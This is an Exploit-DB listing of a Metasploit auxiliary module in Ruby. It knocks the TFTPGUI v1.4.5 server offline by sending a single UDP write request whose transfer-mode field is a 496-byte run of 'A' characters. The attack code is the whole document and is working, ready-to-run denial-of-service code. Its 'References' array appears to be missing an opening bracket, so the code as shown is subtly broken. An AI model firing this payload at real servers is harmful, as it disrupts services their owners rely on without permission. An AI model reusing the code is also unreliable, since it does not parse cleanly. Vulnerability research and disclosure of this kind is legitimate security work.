TFTPGUI v1.4.5 Long Transport Mode Overflow DoS (Meta)

# Title: TFTPGUI v1.4.5 Long Transport Mode Overflow
# EDB-ID: 12482
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Jeremiah Talamantes
# Published: 2010-05-02
# Verified: yes
  
##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/ 
##
  
##
#
# TFTPGUI v1.4.5 Long Transport Mode Overflow
#
# Tested on: Windows XP, SP2 (EN)
#
# Date tested: 5/2/2010
#
#
# |~Greetz to Devin @ infointox.net~|
#
# Discovered by: Jeremiah Talamantes
# RedTeam Security
# http://www.redteamsecure.com
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Auxiliary
  
    include Msf::Exploit::Remote::Udp
    include Msf::Auxiliary::Dos
  
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'TFTPGUI v1.4.5 Long Transport Mode Overflow',
            'Description'    => %q{
                The TFTPUtil GUI server version 1.4.5 can be
                DOSed by sending a specially crafted request. Discovered by
                Jeremiah Talamantes at RedTeam Security. 
                Greetz to Devin @ infointox.net.
            },
            'Author'         => 'Jeremiah Talamantes (RedTeam Security)',
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 9179 $',
            'References'     =>
                
                    [ 'URL', 'http://www.redteamsecure.com/labs/post/37/redteam-discovers-0-day-in-tftpgui'], 
                    [ 'URL', 'http://www.exploit-db.com/exploits/12482'], 
                    [ 'URL', 'http://www.securityfocus.com/bid/39872'],
                ],
            'DisclosureDate' => 'May 02 2010'))
  
        register_options([Opt::RPORT(69)])
    end
  
    def run
        connect_udp
        print_status("Sending naughty request...")
        $fn = "A"
        $md = "A" * 496
        $stuff = "\00\x02" + $fn + "\0" + $md + "\0"
        udp_sock.put($stuff)        
        disconnect_udp
    end
end
发表评论?

0 条评论。

发表评论